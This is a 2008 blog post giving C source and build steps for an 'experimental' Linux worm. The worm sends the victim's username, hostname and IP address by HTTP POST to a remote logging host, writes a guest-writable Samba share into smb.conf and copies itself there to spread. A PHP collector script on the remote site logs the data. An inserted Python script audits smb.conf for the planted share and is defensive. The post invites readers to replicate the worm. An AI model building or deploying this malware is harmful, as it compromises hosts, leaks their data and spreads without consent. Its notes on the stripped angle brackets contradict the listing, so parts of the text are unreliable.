Saturday, 1 March 2008

Experimental Linux worm

Today, in my bored state of mind, my thoughts stumbled upon the concept of a *nix worm. So, I decided to give it a try and do some experimental stuff. I wanted my little project to be something simple and interesting at the same time.

The particularity that differentiates a worm from other types of malware is the fact that it can propagate in the wild. So, in our case, the propagation method will be the replication of the worm through Samba shares.
However, the worm would need root access to achieve this goal; I will not present the methods it could use to escalate its privileges.
Another feature that my experimental worm has is the ability to send information about its host, like hostname and IP, to a remote site, using simple POST requests. This could be used by someone to track the worm's activity and spreading rate. It is improbable that these POST requests will be blocked, because of the highly permissive treatment of outgoing connections on port 80 on most routers/firewalls.
In the code, you will notice the use of the libcurl library to make POST requests, the use of libc functions to get the information we want from the host, and some simple editing of the smb.conf file to make the /tmp/share directory available on the network.
(The blog software strips the angle brackets around the header names in the listing, because it treats anything between < and > as a tag.)


worm.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <curl/curl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main()
{
    FILE *fd;
    CURL *curl;
    CURLcode makeit;
    struct hostent *he;
    /* Share definition appended to smb.conf: a guest-accessible, writable share on /tmp/share.
       The lines starting with ';' are comments and are ignored by Samba. */
    const char *ceva = "\n[Test]\n\tcomment = teste\n\tpath = /tmp/share/\n;\twritable = yes\n;\tbrowseable= yes\n\tguest ok = yes\navailable = yes\nbrowsable = yes\npublic= yes\nwritable = yes";
    char name[1000] = "user=";
    char *user = getlogin();
    char leg1[666] = "&nume=";
    char host[666];
    char leg2[666] = "&ip=";

    /* Collect what gets reported: login name, hostname and the address the hostname resolves to */
    gethostname(host, sizeof host);
    he = gethostbyname(host);
    if (user == NULL || he == NULL) {
        return 1;   /* getlogin() and gethostbyname() can fail; strcat on NULL would crash */
    }
    /* Build the POST body: user=...&nume=...&ip=... */
    strcat(name, user);
    strcat(name, leg1);
    strcat(name, host);
    strcat(name, leg2);
    strcat(name, inet_ntoa(*(struct in_addr *)he->h_addr));

    /* Report to the remote site with a plain HTTP POST on port 80 */
    curl = curl_easy_init();
    if (curl) {
        curl_easy_setopt(curl, CURLOPT_URL, "http://192.168.0.103/post.php");
        curl_easy_setopt(curl, CURLOPT_POSTFIELDS, name);
        makeit = curl_easy_perform(curl);
        curl_easy_cleanup(curl);
    }

    /* Make a copy of the binary reachable on the network: create the directory,
       register the share in smb.conf (needs root), then copy the binary into it */
    system("mkdir /tmp/share");
    fd = fopen("/etc/samba/smb.conf", "a");
    if (fd != NULL) {
        fputs(ceva, fd);   /* fputs, not fprintf(fd, ceva): the stanza is data, not a format string */
        fclose(fd);
    }
    system("cp worm /tmp/share");   /* assumes the binary is called "worm" and sits in the current directory */
    return 0;
}

If you want to replicate this and experiment yourself, make sure you modify the variable values according to your situation (for example, the site's URL).

To compile it (the -lcurl must come after the source file, otherwise newer linkers drop the library):
gcc -o worm worm.c -lcurl
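The stanza the worm appends to smb.conf is the most visible trace it leaves on a host, so it makes a good audit check. The following is an added example, not code from the post: a small Python script that reads smb.conf the way Samba does (';' and '#' comment lines, case- and whitespace-insensitive parameter names, the "public" and "writeable" synonyms) and flags any share that is guest-accessible, writable and rooted in /tmp. The sample configuration is constructed and ends with the exact stanza from the listing above.

```python
import re
# Constructed sample: a short smb.conf ending with the stanza the post's worm appends.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
[Test]
\tcomment = teste
\tpath = /tmp/share/
;\twritable = yes
;\tbrowseable= yes
\tguest ok = yes
available = yes
browsable = yes
public= yes
writable = yes
"""

def parse_smb_conf(text):
    """Minimal smb.conf reader: ';' and '#' lines are comments, and case and
    whitespace inside parameter names are ignored, as Samba does."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip()
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections

def _yes(value):
    return value.strip().lower() in ("yes", "true", "1")

def risky_shares(text):
    """Shares that are guest-accessible, writable and rooted in /tmp. Samba synonyms:
    'public' for 'guest ok', 'writeable' for 'writable'; 'read only = no' also means writable."""
    flagged = []
    for name, p in parse_smb_conf(text).items():
        if name.lower() == "global":
            continue
        guest = _yes(p.get("guestok", p.get("public", "no")))
        writable = _yes(p.get("writable", p.get("writeable", "no"))) or p.get("readonly", "").lower() == "no"
        if guest and writable and p.get("path", "").startswith("/tmp"):
            flagged.append(name)
    return flagged
```

Run it against the real file with `risky_shares(open("/etc/samba/smb.conf").read())`; an empty list means no guest-writable share under /tmp is configured.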

And, the small php script on the remote site:

<?php
// Receive the three fields the worm POSTs and append them to the log file.
// The same blog bug that ate the angle brackets also ate the <?php ... ?> tags.
$var1 = isset($_POST['user']) ? $_POST['user'] : '';
$var2 = isset($_POST['nume']) ? $_POST['nume'] : '';
$var3 = isset($_POST['ip']) ? $_POST['ip'] : '';
$sdf = fopen("log.txt", "a");
fwrite($sdf, $var1);
fwrite($sdf, "\n");
fwrite($sdf, $var2);
fwrite($sdf, "\n");
fwrite($sdf, $var3);
fwrite($sdf, "\n");
fclose($sdf);
?>

which writes the data to the log.txt file, which has been chmod 777 so the web server can append to it.
This is only a proof of concept and experimental stuff, made for educational purposes.
